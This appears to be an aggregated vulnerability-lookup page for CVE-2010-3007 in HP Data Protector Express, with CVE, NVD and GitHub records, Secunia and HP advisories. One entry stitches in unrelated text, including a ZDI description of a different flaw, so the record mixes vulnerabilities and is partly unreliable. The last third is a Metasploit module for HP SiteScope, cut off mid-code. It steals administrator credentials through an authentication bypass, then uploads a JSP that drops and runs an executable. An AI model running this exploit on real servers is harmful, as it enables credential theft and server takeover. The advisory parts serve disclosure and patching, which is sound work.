Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2010-3007 (GCVE-0-2010-3007)
Vulnerability from cvelistv5 – Published: 2010-09-09 21:00 – Updated: 2024-09-17 01:35
VLAI?
EPSS
Summary
Unspecified vulnerability in HP Data Protector Express, and Data Protector Express Single Server Edition (SSE), 3.x before build 56936 and 4.x before build 56906 allows local users to gain privileges or cause a denial of service via unknown vectors.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T02:55:46.498Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "HPSBMA02576",
"tags": [
"vendor-advisory",
"x_refsource_HP",
"x_transferred"
],
"url": "http://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02498535"
},
{
"name": "SSRT090231",
"tags": [
"vendor-advisory",
"x_refsource_HP",
"x_transferred"
],
"url": "http://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02498535"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Unspecified vulnerability in HP Data Protector Express, and Data Protector Express Single Server Edition (SSE), 3.x before build 56936 and 4.x before build 56906 allows local users to gain privileges or cause a denial of service via unknown vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2010-09-09T21:00:00Z",
"orgId": "74586083-13ce-40fd-b46a-8e5d23cfbcb2",
"shortName": "hp"
},
"references": [
{
"name": "HPSBMA02576",
"tags": [
"vendor-advisory",
"x_refsource_HP"
],
"url": "http://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02498535"
},
{
"name": "SSRT090231",
"tags": [
"vendor-advisory",
"x_refsource_HP"
],
"url": "http://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02498535"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "hp-security-alert@hp.com",
"ID": "CVE-2010-3007",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Unspecified vulnerability in HP Data Protector Express, and Data Protector Express Single Server Edition (SSE), 3.x before build 56936 and 4.x before build 56906 allows local users to gain privileges or cause a denial of service via unknown vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "HPSBMA02576",
"refsource": "HP",
"url": "http://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02498535"
},
{
"name": "SSRT090231",
"refsource": "HP",
"url": "http://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02498535"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "74586083-13ce-40fd-b46a-8e5d23cfbcb2",
"assignerShortName": "hp",
"cveId": "CVE-2010-3007",
"datePublished": "2010-09-09T21:00:00Z",
"dateReserved": "2010-08-13T00:00:00Z",
"dateUpdated": "2024-09-17T01:35:30.704Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"fkie_nvd": {
"configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:hp:data_protector_express:3.1:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"44046D76-CF1E-4BD2-B2BC-DDAE8552EB21\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:hp:data_protector_express:3.5:sp1:*:*:*:*:*:*\", \"matchCriteriaId\": \"0B416366-2680-41E2-ABF9-5CD8D89C7FBA\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:hp:data_protector_express:3.5:sp2:*:*:*:*:*:*\", \"matchCriteriaId\": \"3F5B5D2E-4692-4DA5-805E-B449CFD9DA5A\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:hp:data_protector_express:4.0:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"87954300-744A-4FAA-AC4E-1F1A500A8B08\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:hp:data_protector_express:4.0:sp1:*:*:*:*:*:*\", \"matchCriteriaId\": \"AED70E63-BA67-4A68-A121-C3E80F2D1EF0\"}]}]}, {\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:hp:data_protector_express:3.1:*:single_server:*:*:*:*:*\", \"matchCriteriaId\": \"B9F2AC98-5D46-4BC6-884F-60E6D2047B80\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:hp:data_protector_express:3.5:sp1:single_server:*:*:*:*:*\", \"matchCriteriaId\": \"A3FC228A-4638-41A0-BBA6-44D1C86FE834\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:hp:data_protector_express:3.5:sp2:single_server:*:*:*:*:*\", \"matchCriteriaId\": \"2B5AB9FB-79BF-456B-9698-FB8A28688CFA\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:hp:data_protector_express:4.0:*:single_server:*:*:*:*:*\", \"matchCriteriaId\": \"A7929FE9-5770-4E88-9A0F-15265A75CCD1\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:hp:data_protector_express:4.0:sp1:single_server:*:*:*:*:*\", \"matchCriteriaId\": \"76847B5C-BF40-4825-A468-7B857489570C\"}]}]}]",
"descriptions": "[{\"lang\": \"en\", \"value\": \"Unspecified vulnerability in HP Data Protector Express, and Data Protector Express Single Server Edition (SSE), 3.x before build 56936 and 4.x before build 56906 allows local users to gain privileges or cause a denial of service via unknown vectors.\"}, {\"lang\": \"es\", \"value\": \"Vulnerabilidad no especificada en HP Data Protector Express y Data Protector Express Single Server Edition (SSE), v3.x anterior a build 56936 y v4.x anterior a build 56906 permite a usuarios locales conseguir privilegios o causar una denegaci\\u00f3n de servicio a trav\\u00e9s de vectores desconocidos.\"}]",
"id": "CVE-2010-3007",
"lastModified": "2024-11-21T01:17:51.810",
"metrics": "{\"cvssMetricV2\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"2.0\", \"vectorString\": \"AV:L/AC:L/Au:N/C:C/I:C/A:C\", \"baseScore\": 7.2, \"accessVector\": \"LOCAL\", \"accessComplexity\": \"LOW\", \"authentication\": \"NONE\", \"confidentialityImpact\": \"COMPLETE\", \"integrityImpact\": \"COMPLETE\", \"availabilityImpact\": \"COMPLETE\"}, \"baseSeverity\": \"HIGH\", \"exploitabilityScore\": 3.9, \"impactScore\": 10.0, \"acInsufInfo\": false, \"obtainAllPrivilege\": false, \"obtainUserPrivilege\": false, \"obtainOtherPrivilege\": false, \"userInteractionRequired\": false}]}",
"published": "2010-09-09T22:00:02.437",
"references": "[{\"url\": \"http://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02498535\", \"source\": \"hp-security-alert@hp.com\"}, {\"url\": \"http://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02498535\", \"source\": \"hp-security-alert@hp.com\"}, {\"url\": \"http://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02498535\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"http://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02498535\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}]",
"sourceIdentifier": "hp-security-alert@hp.com",
"vulnStatus": "Modified",
"weaknesses": "[{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"NVD-CWE-noinfo\"}]}]"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2010-3007\",\"sourceIdentifier\":\"hp-security-alert@hp.com\",\"published\":\"2010-09-09T22:00:02.437\",\"lastModified\":\"2025-04-11T00:51:21.963\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Unspecified vulnerability in HP Data Protector Express, and Data Protector Express Single Server Edition (SSE), 3.x before build 56936 and 4.x before build 56906 allows local users to gain privileges or cause a denial of service via unknown vectors.\"},{\"lang\":\"es\",\"value\":\"Vulnerabilidad no especificada en HP Data Protector Express y Data Protector Express Single Server Edition (SSE), v3.x anterior a build 56936 y v4.x anterior a build 56906 permite a usuarios locales conseguir privilegios o causar una denegaci\u00f3n de servicio a trav\u00e9s de vectores desconocidos.\"}],\"metrics\":{\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:L/AC:L/Au:N/C:C/I:C/A:C\",\"baseScore\":7.2,\"accessVector\":\"LOCAL\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"COMPLETE\",\"integrityImpact\":\"COMPLETE\",\"availabilityImpact\":\"COMPLETE\"},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":3.9,\"impactScore\":10.0,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"NVD-CWE-noinfo\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:hp:data_protector_express:3.1:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"44046D76-CF1E-4BD2-B2BC-DDAE8552EB21\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:hp:data_protector_express:3.5:sp1:*:*:*:*:*:*\",\"matchCriteriaId\":\"0B416366-2680-41E2-ABF9-5CD8D89C7FBA\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:hp:data_protector_express:3.5:sp2:*:*:*:*:*:*\",\"matchCriteriaId\":\"3F5B5D2E-4692-4DA5-805E-B449CFD9DA5A\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:hp:data_protector_express:4.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"87954300-744A-4FAA-AC4E-1F1A500A8B08\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:hp:data_protector_express:4.0:sp1:*:*:*:*:*:*\",\"matchCriteriaId\":\"AED70E63-BA67-4A68-A121-C3E80F2D1EF0\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:hp:data_protector_express:3.1:*:single_server:*:*:*:*:*\",\"matchCriteriaId\":\"B9F2AC98-5D46-4BC6-884F-60E6D2047B80\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:hp:data_protector_express:3.5:sp1:single_server:*:*:*:*:*\",\"matchCriteriaId\":\"A3FC228A-4638-41A0-BBA6-44D1C86FE834\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:hp:data_protector_express:3.5:sp2:single_server:*:*:*:*:*\",\"matchCriteriaId\":\"2B5AB9FB-79BF-456B-9698-FB8A28688CFA\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:hp:data_protector_express:4.0:*:single_server:*:*:*:*:*\",\"matchCriteriaId\":\"A7929FE9-5770-4E88-9A0F-15265A75CCD1\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:hp:data_protector_express:4.0:sp1:single_server:*:*:*:*:*\",\"matchCriteriaId\":\"76847B5C-BF40-4825-A468-7B857489570C\"}]}]}],\"references\":[{\"url\":\"http://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02498535\",\"source\":\"hp-security-alert@hp.com\"},{\"url\":\"http://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02498535\",\"source\":\"hp-security-alert@hp.com\"},{\"url\":\"http://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02498535\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02498535\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}"
}
}
GHSA-89JP-7F7P-29P6
Vulnerability from github – Published: 2022-05-13 01:39 – Updated: 2022-05-13 01:39
VLAI?
Details
Unspecified vulnerability in HP Data Protector Express, and Data Protector Express Single Server Edition (SSE), 3.x before build 56936 and 4.x before build 56906 allows local users to gain privileges or cause a denial of service via unknown vectors.
{
"affected": [],
"aliases": [
"CVE-2010-3007"
],
"database_specific": {
"cwe_ids": [],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2010-09-09T22:00:00Z",
"severity": "HIGH"
},
"details": "Unspecified vulnerability in HP Data Protector Express, and Data Protector Express Single Server Edition (SSE), 3.x before build 56936 and 4.x before build 56906 allows local users to gain privileges or cause a denial of service via unknown vectors.",
"id": "GHSA-89jp-7f7p-29p6",
"modified": "2022-05-13T01:39:34Z",
"published": "2022-05-13T01:39:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3007"
},
{
"type": "WEB",
"url": "http://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02498535"
}
],
"schema_version": "1.4.0",
"severity": []
}
VAR-201009-0282
Vulnerability from variot - Updated: 2023-12-18 13:58Unspecified vulnerability in HP Data Protector Express, and Data Protector Express Single Server Edition (SSE), 3.x before build 56936 and 4.x before build 56906 allows local users to gain privileges or cause a denial of service via unknown vectors. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Data Protector. Authentication is not required to exploit this vulnerability.The specific flaw exists within the function DtbClsLogin defined in the module dpwindtb.dll on Windows and libdplindtb.so on Linux. This function takes user supplied input and copies it directly to a stack buffer. By providing a large enough string this buffer can be overrun and may result in arbitrary code execution dependent on the underlying operating system. One of those calls is getSiteScopeConfiguration() which will return the current configuration of the server including the administrator login and password information. ----------------------------------------------------------------------
Windows Applications Insecure Library Loading
The Official, Verified Secunia List: http://secunia.com/advisories/windows_insecure_library_loading/
The list is continuously updated as we confirm the vulnerability reports so check back regularly too see if any of your apps are affected.
TITLE: HP Data Protector Express Denial of Service and Privilege Escalation
SECUNIA ADVISORY ID: SA41361
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/41361/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=41361
RELEASE DATE: 2010-09-10
DISCUSS ADVISORY: http://secunia.com/advisories/41361/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/41361/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=41361
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been reported in HP Data Protector Express, which can be exploited by malicious, local users to cause a DoS (Denial of Service) or potentially gain escalated privileges.
The vulnerability is caused due to an unspecified error. No further information is currently available.
PROVIDED AND/OR DISCOVERED BY: The vendor credits AbdulAziz Hariri of Insight Technologies via ZDI.
ORIGINAL ADVISORY: HPSBMA02576 SSRT090231: http://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02498535
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
.
References: CVE-2010-3007, ZDI-CAN 581
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
Note: The supported versions of Microsoft Windows, Linux, and Novell NetWare are listed below.
Note: Users can identify the build number by clicking on 'Help' and then 'About'.
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2010-3007 (AV:L/AC:L/Au:S/C:P/I:C/A:C) 6.4 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
The Hewlett-Packard Company thanks AbdulAziz Hariri of Insight Technologies along with TippingPoint.s Zero Day Initiative for reporting this vulnerability to security-alert@hp.com HP Data Protector Express 'Hot Fix' (Build 56936) for version 3.5 SP2 is supported on the following:
Windows Operating Systems Version
Microsoft Windows Unified Data Storage Server (incl. R2)
Microsoft Windows Server 2003 Enterprise / Standard Editions (incl. R2)
Microsoft Windows Storage Server 2003 (incl. R2)
Microsoft Windows 2000 Server / Advanced Server SP4
Microsoft Windows Small Business Server 2000 SP4
Microsoft Windows 2000 Professional SP4
Microsoft Windows Small Business 2003 Server Premium / Standard (incl. R2)
Microsoft Windows XP Professional / Home SP2
Linux Operating Systems Version
Red Hat Enterprise Linux (WS/ES/AS) 5
Red Hat Enterprise Linux (WS/ES/AS) 4
Red Hat Enterprise Linux (WS/ES/AS) 3
SuSE Linux Enterprise Server 10
SuSE Linux Enterprise Server 9
Novell Operating Systems Version
NetWare 6.5 SP2
NetWare 6.0 SP3
HP Data Protector Express 'Hot Fix' (Build 56906) for version 4.0 SP1 is supported on the following: Windows Operating Systems Version
Windows Server 2008 SP1 (32-bit and X64) Enterprise / Standard / Datacenter / Web Server Editions
Windows Server 2003 R2 SP2 (32-bit and X64) Enterprise / Standard Editions
Windows Small Business Server 2008 (32-bit and X64)
Windows Small Business Server 2003 R2 (32-bit and X64)
Windows Unified Data Storage Server 2003 R2 (32-bit and X64)
Windows Storage Server 2003 R2 (32-bit and X64)
Windows VISTA SP1 (32-bit and X64)
Windows XP SP3 (32-bit)
Linux Operating Systems Version
Red Hat Enterprise Linux (WS/ES/AS) 5.0 update 1 (32-bit and X64)
Red Hat Enterprise Linux (WS/ES/AS) 4.0 update 6 (32-bit and X64)
SuSE Linux Enterprise Server 10 update 2 (32-bit and X64)
SuSE Linux Enterprise Server 9 update 4 (32-bit and X64)
Novell Operating Systems Version
NetWare 6.5 SP5
RESOLUTION
HP has provided upgrades to resolve this vulnerability.
PRODUCT SPECIFIC INFORMATION None
HISTORY Version:1 (rev.1) 8 September 2010 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-alert@hp.com Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches -check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems -verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do
- The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:
GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
Copyright 2009 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux)
iEYEARECAAYFAkyIYLcACgkQ4B86/C0qfVnz1QCgveZICKBeXxRlmAbL4cZvzgaq mbIAoPqa1Ba0NueuwFSHxxrzX95YSyf3 =sbSc -----END PGP SIGNATURE----- .
-- Vendor Response: Hewlett-Packard has issued an update to correct this vulnerability. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . ##
This file is part of the Metasploit Framework and may be subject to
redistribution and commercial restrictions. Please see the Metasploit
web site for more information on licensing and terms of use.
http://metasploit.com/
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'HP SiteScope Remote Code Execution',
'Description' => %q{
This module exploits a code execution flaw in HP SiteScope. It exploits two
vulnerabilities in order to get its objective. An authentication bypass in the
getSiteScopeConfiguration operation, available through the APISiteScopeImpl AXIS
service, to retrieve the administrator credentials and subsequently abuses the
UploadManagerServlet to upload an arbitrary payload embedded in a JSP. The module
has been tested successfully on HP SiteScope 11.20 over Windows 2003 SP2.
},
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '85120' ],
[ 'OSVDB', '85121' ],
[ 'BID', '55269' ],
[ 'BID', '55273' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-173/' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-174/' ]
],
'Privileged' => true,
'Platform' => 'win',
'Targets' =>
[
[ 'HP SiteScope 11.20 / Windows x86',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
},
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 29 2012'))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, 'Path to SiteScope', '/SiteScope/'])
], self.class)
end
def on_new_session(client)
if client.type == "meterpreter"
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
client.fs.file.rm("../#{@var_hexfile}.txt")
client.fs.file.rm("../#{@jsp_name}.jsp")
else
client.shell_command_token("del ..\\#{@var_hexfile}.txt")
client.shell_command_token("del ..\\#{@jsp_name}.jsp")
end
end
def exploit
@peer = "#{rhost}:#{rport}"
@uri = target_uri.path
@uri << '/' if @uri[-1,1] != '/'
# Retrieve administrator credentials
print_status("#{@peer} - Retrieving HP SiteScope Configuration")
conf = access_configuration
if not conf or conf.empty?
print_error("#{@peer} - Failed to retrieve the HP SiteScope Configuration")
return
end
print_status("#{@peer} - Retrieving HP SiteScope administrator credentials")
admin_data = conf.split("\x03\x5F\x69\x64\x74\x00\x0D\x61\x64\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x6F\x72\x74\x00")[1]
if not admin_data or admin_data.empty?
print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials")
return
end
admin_password = admin_data.split(/\x09_passwordt\x00/)[1]
if not admin_password or admin_password.empty?
print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials")
return
end
password_length = admin_password.unpack("C").first
if password_length > 0
password = admin_password[1, password_length]
else
password = ""
end
admin_user_type, admin_user = admin_password.split(/\x06(_login[q|t])\x00/)[1, 2]
if not admin_user_type or admin_user_type.empty?
print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials")
return
end
if admin_user_type == "_logint"
if not admin_user or admin_user.empty?
print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials")
return
end
user_length = admin_user.unpack("C").first
else
user_length = 0
end
if user_length > 0
user = admin_user[1, user_length]
else
user = ""
end
# Generate an initial JSESSIONID
print_status("#{@peer} - Retrieving an initial JSESSIONID")
res = send_request_cgi(
'uri' => "#{@uri}servlet/Main",
'method' => 'POST',
)
if res and res.code == 200 and res.headers['Set-Cookie'] =~ /JSESSIONID=([0-9A-F]*);/
session_id = $1
else
print_error("#{@peer} - Retrieve of initial JSESSIONID failed")
return
end
# Authenticate
login_data = "j_username=#{user}&j_password=#{password}"
print_status("#{@peer} - Authenticating on HP SiteScope Configuration")
res = send_request_cgi(
{
'uri' => "#{@uri}j_security_check",
'method' => 'POST',
'data' => login_data,
'ctype' => "application/x-www-form-urlencoded",
'headers' =>
{
'Cookie' => "JSESSIONID=#{session_id}",
}
})
if res and res.code == 302 and res.headers['Set-Cookie'] =~ /JSESSIONID=([0-9A-F]*);/
session_id = $1
redirect = URI(res.headers['Location']).path
else
print_error("#{@peer} - Authentication on SiteScope failed")
return
end
# Follow redirection to complete authentication process
print_status("#{@peer} - Following redirection to finish authentication")
res = send_request_cgi(
{
'uri' => redirect,
'method' => 'GET',
'headers' =>
{
'Cookie' => "JSESSIONID=#{session_id}",
}
})
if not res or res.code != 200
print_error("#{@peer} - Authentication on SiteScope failed")
return
end
# Upload the JSP and the raw payload
@jsp_name = rand_text_alphanumeric(8+rand(8))
# begin <payload>.jsp
var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8)
var_exepath = Rex::Text.rand_text_alpha(rand(8)+8)
var_data = Rex::Text.rand_text_alpha(rand(8)+8)
var_inputstream = Rex::Text.rand_text_alpha(rand(8)+8)
var_outputstream = Rex::Text.rand_text_alpha(rand(8)+8)
var_numbytes = Rex::Text.rand_text_alpha(rand(8)+8)
var_bytearray = Rex::Text.rand_text_alpha(rand(8)+8)
var_bytes = Rex::Text.rand_text_alpha(rand(8)+8)
var_counter = Rex::Text.rand_text_alpha(rand(8)+8)
var_char1 = Rex::Text.rand_text_alpha(rand(8)+8)
var_char2 = Rex::Text.rand_text_alpha(rand(8)+8)
var_comb = Rex::Text.rand_text_alpha(rand(8)+8)
var_exe = Rex::Text.rand_text_alpha(rand(8)+8)
@var_hexfile = Rex::Text.rand_text_alpha(rand(8)+8)
var_proc = Rex::Text.rand_text_alpha(rand(8)+8)
var_fperm = Rex::Text.rand_text_alpha(rand(8)+8)
var_fdel = Rex::Text.rand_text_alpha(rand(8)+8)
jspraw = "<%@ page import=\"java.io.*\" %>\n"
jspraw << "<%\n"
jspraw << "String #{var_hexpath} = application.getRealPath(\"/\") + \"/#{@var_hexfile}.txt\";\n"
jspraw << "String #{var_exepath} = System.getProperty(\"java.io.tmpdir\") + \"/#{var_exe}\";\n"
jspraw << "String #{var_data} = \"\";\n"
jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n"
jspraw << "#{var_exepath} = #{var_exepath}.concat(\".exe\");\n"
jspraw << "}\n"
jspraw << "FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\n"
jspraw << "FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\n"
jspraw << "int #{var_numbytes} = #{var_inputstream}.available();\n"
jspraw << "byte #{var_bytearray}[] = new byte[#{var_numbytes}];\n"
jspraw << "#{var_inputstream}.read(#{var_bytearray});\n"
jspraw << "#{var_inputstream}.close();\n"
jspraw << "byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\n"
jspraw << "for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\n"
jspraw << "{\n"
jspraw << "char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\n"
jspraw << "char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\n"
